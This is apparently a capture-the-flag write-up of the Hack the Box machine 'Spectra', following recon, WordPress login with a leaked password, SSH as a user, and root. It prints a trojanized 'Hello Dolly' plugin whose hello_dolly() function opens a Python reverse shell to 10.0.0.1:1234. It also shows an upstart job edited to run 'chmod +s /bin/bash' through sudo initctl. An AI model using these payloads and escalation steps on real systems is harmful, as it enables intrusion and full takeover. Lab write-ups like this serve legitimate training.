🟢Spectra

Spectra - Hack the Box Machine

name: Spectra

OS: Other

Difficulty: Easy

Points: 20

Release: 27 Feb 2021 I

P: 10.10.10.229

Nmap

nmap -v -sCV -O 10.10.10.229

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.1 (protocol 2.0)
80/tcp   open  http    nginx 1.17.4
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.17.4
3306/tcp open  mysql   MySQL (unauthorized)

Web Service (nginx - 80)

By clicking on any of these links, we are redirected to a hostname (spectra.htb).

so I added it to my /etc/hosts

10.10.10.229 spectra.htb

Wordpress (1st Link)

http://spectra.htb/main/

Wpscan

wpscan --url http://spectra.htb/main/ -e vp,vt,u

         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.15
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://spectra.htb/main/ [10.10.10.229]
[+] Started: Mon Mar  8 18:18:35 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: nginx/1.17.4
 |  - X-Powered-By: PHP/5.6.40
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://spectra.htb/main/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://spectra.htb/main/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://spectra.htb/main/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://spectra.htb/main/?feed=rss2, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://spectra.htb/main/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://spectra.htb/main/wp-content/themes/twentynineteen/
 | Last Updated: 2020-12-22T00:00:00.000Z
 | Readme: http://spectra.htb/main/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 1.9
 | Style URL: http://spectra.htb/main/wp-content/themes/twentynineteen/style.css?ver=1.5
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://spectra.htb/main/wp-content/themes/twentynineteen/style.css?ver=1.5, Match: 'Version: 1.5'


[i] No plugins Found.


[i] No themes Found.


[i] User(s) Identified:

[+] administrator
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Mar  8 18:19:05 2021
[+] Requests Done: 343
[+] Cached Requests: 48
[+] Data Sent: 91.765 KB
[+] Data Received: 59.735 KB
[+] Memory used: 250.008 MB
[+] Elapsed time: 00:00:30

(user: administrator)

/testing/ (2nd Link)

second link:

http://spectra.htb/testing/index.php

So I looked at /testing/ directory.

http://spectra.htb/testing/

The file "wp-config.php.save" caught my attention. We can't see the source code from a .php file, but if it's with any other extension we can, like ".php.txt" ou ".php.save".

Looking at the source code we see some interesting things.

We can try to log into wordpress with the user "administrator" that wpscan showed us, with the password "devteam01" that we see in this file.

http://spectra.htb/main/wp-login.php

it works!!

Getting shell

I tried to change some php files, like the header files or some plugins. nothing worked. so I decided to put my own plugin with a reverse shell. For that, I got the "Hello Dolly" plugin (this plugin adds a phrase from the song "hello dolly" at the top of every dashboard page). So I took the only file that makes up this plugin and copied it to my machine, added a reverse shell, made it into a .zip file, uploaded it as a new plugin on the server, activated it, and got a shell.

my hello2.php

/**
 * @package Hello_Dolly
 * @version 1.7.2
 */
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.7.2
Author URI: http://ma.tt/
*/

function hello_dolly_get_lyric() {
    /** These are the lyrics to Hello Dolly */
    $lyrics = "Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, take her wrap, fellas
Dolly, never go away again
Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, golly, gee, fellas
Have a little faith in me, fellas
Dolly, never go away
Promise, you'll never go away
Dolly'll never go away again";

    // Here we split it into lines.
    $lyrics = explode( "\n", $lyrics );

    // And then randomly choose a line.
    return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );
}

// This just echoes the chosen line, we'll position it later.
function hello_dolly() {
    system('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
    $chosen = hello_dolly_get_lyric();
    $lang   = '';
    if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {
        $lang = ' lang="en"';
    }

    printf(
        '<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>',
        __( 'Quote from Hello Dolly song, by Jerry Herman:' ),
        $lang,
        $chosen
    );
}

// Now we set that function up to execute when the admin_notices action is called.
add_action( 'admin_notices', 'hello_dolly' );

// We need some CSS to position the paragraph.
function dolly_css() {
    echo "
    <style type='text/css'>
    #dolly {
        float: right;
        padding: 5px 10px;
        margin: 0;
        font-size: 12px;
        line-height: 1.6666;
    }
    .rtl #dolly {
        float: left;
    }
    .block-editor-page #dolly {
        display: none;
    }
    @media screen and (max-width: 782px) {
        #dolly,
        .rtl #dolly {
            float: none;
            padding-left: 0;
            padding-right: 0;
        }
    }
    </style>
    ";
}

add_action( 'admin_head', 'dolly_css' );

(i put my reverse shell in the "hello_dolly()" function)

uploading the .zip file

by clicking "activate Plugin" we get our shell.

to improve our shell run:

bash -i

export TERM=xterm

User

after some enumerations, I looked at the /opt folder. Here we have something interesting.

looking at this configuration file we have that in "/etc/autologin/passwd" there is probably a password.

Now we have a password. Let's try to find out which user it belongs to. Looking at /etc/passwd this password seems to be for user "katie"

katie:x:20156:20157::/home/katie:/bin/bash

We can try to log in using ssh.

ssh [email protected]

password: SummerHereWeCome!!

Privilege escalation to root

With user katie we can run "sudo -l" and see that we have permission to run the "initctl" command as root.

sudo -l

User katie may run the following commands on spectra:
    (ALL) SETENV: NOPASSWD: /sbin/initctl

"initctl" is a program for managing services. We can create, start, stop or restart a service using it. During the process of starting a service, we can request that it run some commands. We are going to look for a service that we can change this command configuration to run code as root.

cd /etc/init

nano test.conf

description "Test node.js server"
author      "katie"

start on filesystem or runlevel [2345]
stop on shutdown

script

    chmod +s /bin/bash
    export HOME="/srv"
    echo $$ > /var/run/nodetest.pid
    exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js

end script

pre-start script
    echo "[`date`] Node Test Starting" >> /var/log/nodetest.log
end script

pre-stop script
    rm /var/run/nodetest.pid
    echo "[`date`] Node Test Stopping" >> /var/log/nodetest.log
end script

I used the settings of the "test" service (test.conf file). I added "chmod +s /bin/bash" to the "script" section in this configuration file. When I run the command to start the service as root, it will run this command also as root. Then we just use "bash -p" to exploit this permission in bash and make it root.

(to put it simply: "chmod +s" turns the binary runnable as root)

sudo -u root initctl start test

bash -p

owned.

PreviousMachines NextBlunder

Last updated 4 years ago